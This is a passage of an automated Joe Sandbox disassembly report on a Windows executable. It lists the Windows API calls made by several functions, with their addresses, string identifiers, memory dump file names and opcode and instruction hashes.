                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID: S
                                                                            • API String ID: 1211466189-2858979982
                                                                            • Opcode ID: e661aef72ca0bd7657d5dbd3fea7ac2b428fa2345ed19e892708bbdfb318ae4f
                                                                            • Instruction ID: f1db07af3c28e6ba889f04e05b2b7142538fb32d280bc264a109cf1817897a39
                                                                            • Opcode Fuzzy Hash: e661aef72ca0bd7657d5dbd3fea7ac2b428fa2345ed19e892708bbdfb318ae4f
                                                                            • Instruction Fuzzy Hash: EEB17A71600219EFDF14EF68C985BAD7BB1FF08711F088169ED58DB295E734A990CB90
                                                                            APIs
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • CoInitialize.OLE32 ref: 00878403
                                                                            • CoUninitialize.OLE32 ref: 0087840E
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00892BEC,?), ref: 0087846E
                                                                            • IIDFromString.OLE32(?,?), ref: 008784E1
                                                                            • VariantInit.OLEAUT32(?), ref: 0087857B
                                                                            • VariantClear.OLEAUT32(?), ref: 008785DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 834269672-1287834457
                                                                            • Opcode ID: 95bac8777e34838809ceab58dbda8eebbbf7881986ecb53d8398f03d66f38f74
                                                                            • Instruction ID: 6f7bdaa70f8f9a952785ec6caf8b76470009e12566240bb4e6f0df814dc5a297
                                                                            • Opcode Fuzzy Hash: 95bac8777e34838809ceab58dbda8eebbbf7881986ecb53d8398f03d66f38f74
                                                                            • Instruction Fuzzy Hash: ED617B70648312DFC710DF28C849A6ABBE8FF49754F048519F989DB292CB70ED48CB96
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00875793
                                                                            • inet_addr.WSOCK32(?,?,?), ref: 008757D8
                                                                            • gethostbyname.WSOCK32(?), ref: 008757E4
                                                                            • IcmpCreateFile.IPHLPAPI ref: 008757F2
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00875862
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00875878
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008758ED
                                                                            • WSACleanup.WSOCK32 ref: 008758F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: 4887329cf11b086acc871a99f30d9898909538e29c107c673e0a247d5ce920e0
                                                                            • Instruction ID: 23b5532bc70271d9c041daaf96e742a4802de1ce1ccf6c1634f6736f9f2af605
                                                                            • Opcode Fuzzy Hash: 4887329cf11b086acc871a99f30d9898909538e29c107c673e0a247d5ce920e0
                                                                            • Instruction Fuzzy Hash: 0F516F716046009FDB10AF28DC85B2A7BE4FF48724F148569F99ADB2E5DB70E900DB52
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0086B4D0
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0086B546
                                                                            • GetLastError.KERNEL32 ref: 0086B550
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0086B5BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: e585f0ea3804a9f4d1540375ff6dabd6c7e368b7add80948e90b65362a00aa1b
                                                                            • Instruction ID: e41dd9c973ac94c7229e6228edd5bb75be086ec9484acbda04886bd3f80c94bf
                                                                            • Opcode Fuzzy Hash: e585f0ea3804a9f4d1540375ff6dabd6c7e368b7add80948e90b65362a00aa1b
                                                                            • Instruction Fuzzy Hash: 48318F35A00209EFCB11EF68CC89AEE7BB4FF09318F114125E616DB292DB709A81CB51
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00859014
                                                                            • GetDlgCtrlID.USER32 ref: 0085901F
                                                                            • GetParent.USER32 ref: 0085903B
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0085903E
                                                                            • GetDlgCtrlID.USER32(?), ref: 00859047
                                                                            • GetParent.USER32(?), ref: 00859063
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00859066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: 2e9257acc5b61b019a24339f9c842b27b389ebb688fa67bad46dcbd4ea6733ad
                                                                            • Instruction ID: e606a06227a374939b7b3a8a89d78725f13c6c417e9d649d290320f7a04063bd
                                                                            • Opcode Fuzzy Hash: 2e9257acc5b61b019a24339f9c842b27b389ebb688fa67bad46dcbd4ea6733ad
                                                                            • Instruction Fuzzy Hash: 8621A170A00108BBDF15ABA8CC85EFEBB65FF59310F100265FA61972E2EB755819DB21
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008590FD
                                                                            • GetDlgCtrlID.USER32 ref: 00859108
                                                                            • GetParent.USER32 ref: 00859124
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00859127
                                                                            • GetDlgCtrlID.USER32(?), ref: 00859130
                                                                            • GetParent.USER32(?), ref: 0085914C
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0085914F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: cc54ae8cc96ee4e6b1b4a36c970ecc37e752ea0ca9210986b8f4795f66856875
                                                                            • Instruction ID: b704d4391ee5c16b2d55d0f348299b8520abd9122e158bd1d6ed0d8f0dfca833
                                                                            • Opcode Fuzzy Hash: cc54ae8cc96ee4e6b1b4a36c970ecc37e752ea0ca9210986b8f4795f66856875
                                                                            • Instruction Fuzzy Hash: 4921C474A00108BBDF11ABA8CC85EFEBB65FF55301F100115FA51D72A2EB795419DB21
                                                                            APIs
                                                                            • GetParent.USER32 ref: 0085916F
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00859184
                                                                            • _wcscmp.LIBCMT ref: 00859196
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00859211
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1704125052-3381328864
                                                                            • Opcode ID: 860e1113e6603673840a4c2b644293898a69d13b92cd9859c8af42cb50e514ec
                                                                            • Instruction ID: 3ed7c647c962af8c418de9b52b1dfe221d9bc3cfe44614226353583cc7c83ec6
                                                                            • Opcode Fuzzy Hash: 860e1113e6603673840a4c2b644293898a69d13b92cd9859c8af42cb50e514ec
                                                                            • Instruction Fuzzy Hash: E1112C3A288327F9FA212628EC06DE73B9CFB15721F200026FE20E41D2FF6968556655
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 008788D7
                                                                            • CoInitialize.OLE32(00000000), ref: 00878904
                                                                            • CoUninitialize.OLE32 ref: 0087890E
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00878A0E
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00878B3B
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00892C0C), ref: 00878B6F
                                                                            • CoGetObject.OLE32(?,00000000,00892C0C,?), ref: 00878B92
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00878BA5
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00878C25
                                                                            • VariantClear.OLEAUT32(?), ref: 00878C35
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: ba70dfbe8da7d5f448c1103ddb91926ca76ce7da009012bf7cb5691948119a1a
                                                                            • Instruction ID: 88a7e0c925591abad47e7a1147383c0dbc64cb559e3b47d824966f62b7102d88
                                                                            • Opcode Fuzzy Hash: ba70dfbe8da7d5f448c1103ddb91926ca76ce7da009012bf7cb5691948119a1a
                                                                            • Instruction Fuzzy Hash: CCC103B1604305AFC700DF68C88892AB7E9FF89358F00896DF59ADB251DB71ED05CB52
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00867A6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafeVartype
                                                                            • String ID:
                                                                            • API String ID: 1725837607-0
                                                                            • Opcode ID: aeef990bf2c803ec0e97c872925e0dd3f62db086e3ce383480dd8d97ef448e3b
                                                                            • Instruction ID: 7f9eebb2eb27108c69c1d02f2750bb8dd1ea9ef46e01ed282a0f8aa33351f608
                                                                            • Opcode Fuzzy Hash: aeef990bf2c803ec0e97c872925e0dd3f62db086e3ce383480dd8d97ef448e3b
                                                                            • Instruction Fuzzy Hash: B3B1AF7190421A9FDB10DFA8D885BBEB7F4FF09329F224429E641EB291D734A941CBD1
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 008611F0
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00860268,?,00000001), ref: 00861204
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0086120B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860268,?,00000001), ref: 0086121A
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0086122C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860268,?,00000001), ref: 00861245
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00860268,?,00000001), ref: 00861257
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00860268,?,00000001), ref: 0086129C
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00860268,?,00000001), ref: 008612B1
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00860268,?,00000001), ref: 008612BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: ec1810bc4795bd5b4b533a4cb0d6aa7263f70cc48c536c5f65f6fb0c9a4d7798
                                                                            • Instruction ID: 94913e8665c57bd0c1b718785faddd381c8c8c8f749082909420b160769076a3
                                                                            • Opcode Fuzzy Hash: ec1810bc4795bd5b4b533a4cb0d6aa7263f70cc48c536c5f65f6fb0c9a4d7798
                                                                            • Instruction Fuzzy Hash: 8C31AE75610208ABDF10DF54FC58F6937BAFF54315F154229F901C72A2EB74AD508B50
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0080FAA6
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 0080FB45
                                                                            • UnregisterHotKey.USER32(?), ref: 0080FC9C
                                                                            • DestroyWindow.USER32(?), ref: 008445D6
                                                                            • FreeLibrary.KERNEL32(?), ref: 0084463B
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00844668
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: d8481203610356dd5064f9ed68c5ba04131fa05055b2a6a782a044b8766855f7
                                                                            • Instruction ID: 97f13684d663195bb9d0d620bdda0e8fd70fe302d364f9d354957617b921e685
                                                                            • Opcode Fuzzy Hash: d8481203610356dd5064f9ed68c5ba04131fa05055b2a6a782a044b8766855f7
                                                                            • Instruction Fuzzy Hash: 38A17C303012268FDB68EF18C895B69F764FF15714F1142ADE90AEB6A2DB30AC56CF51
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,0085A439), ref: 0085A377
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 3555792229-1603158881
                                                                            • Opcode ID: 9f1496a0ad6cd87b15d8181d5d562794c9046f9da9ab0cae7f151ab7b9c84c62
                                                                            • Instruction ID: 78cbaef5d5192757c552b90a66ffbd53bb3540ac30e7c9aa77a290a29c74f6ae
                                                                            • Opcode Fuzzy Hash: 9f1496a0ad6cd87b15d8181d5d562794c9046f9da9ab0cae7f151ab7b9c84c62
                                                                            • Instruction Fuzzy Hash: BF919431500615AACB0CDFA4C8D2BEDFB64FF04305F548229ED5AE7291DB31699DCB92
                                                                            APIs
                                                                            • IsWindow.USER32(00E25320), ref: 0088B3EB
                                                                            • IsWindowEnabled.USER32(00E25320), ref: 0088B3F7
                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0088B4DB
                                                                            • SendMessageW.USER32(00E25320,000000B0,?,?), ref: 0088B512
                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0088B54F
                                                                            • GetWindowLongW.USER32(00E25320,000000EC), ref: 0088B571
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0088B589
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID: S
                                                                            • API String ID: 4072528602-2858979982
                                                                            • Opcode ID: 15b26518efd85ed8d6971a864ad8378e6d74ced03bd041d4a42c233f2a8d34f2
                                                                            • Instruction ID: 620e507eca49535ce326dbc78ce0a614cbd264f2214c2048322cc46645e36f47
                                                                            • Opcode Fuzzy Hash: 15b26518efd85ed8d6971a864ad8378e6d74ced03bd041d4a42c233f2a8d34f2
                                                                            • Instruction Fuzzy Hash: 78718C34600604EFDF20AFA4C895FBA7BB9FF89300F144169EA46D73A2D731A980CB54
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00802EAE
                                                                              • Part of subcall function 00801DB3: GetClientRect.USER32(?,?), ref: 00801DDC
                                                                              • Part of subcall function 00801DB3: GetWindowRect.USER32(?,?), ref: 00801E1D
                                                                              • Part of subcall function 00801DB3: ScreenToClient.USER32(?,?), ref: 00801E45
                                                                            • GetDC.USER32 ref: 0083CD32
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0083CD45
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0083CD53
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0083CD68
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0083CD70
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0083CDFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: bea5ea6e766351891da99b46b8e21f535005114bfb31308716cc6cb86595ee8d
                                                                            • Instruction ID: 5071d300afdcc05d03021da4989434cdbd01615d95715436e6f5c4438a94662b
                                                                            • Opcode Fuzzy Hash: bea5ea6e766351891da99b46b8e21f535005114bfb31308716cc6cb86595ee8d
                                                                            • Instruction Fuzzy Hash: 4571B231500209DFCF21DF64CC84AAA7BB5FF88324F14427AFD55EA2A6D7319891DBA1
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00871A50
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00871A7C
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00871ABE
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00871AD3
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871AE0
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00871B10
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00871B57
                                                                              • Part of subcall function 00872483: GetLastError.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 00872498
                                                                              • Part of subcall function 00872483: SetEvent.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 008724AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
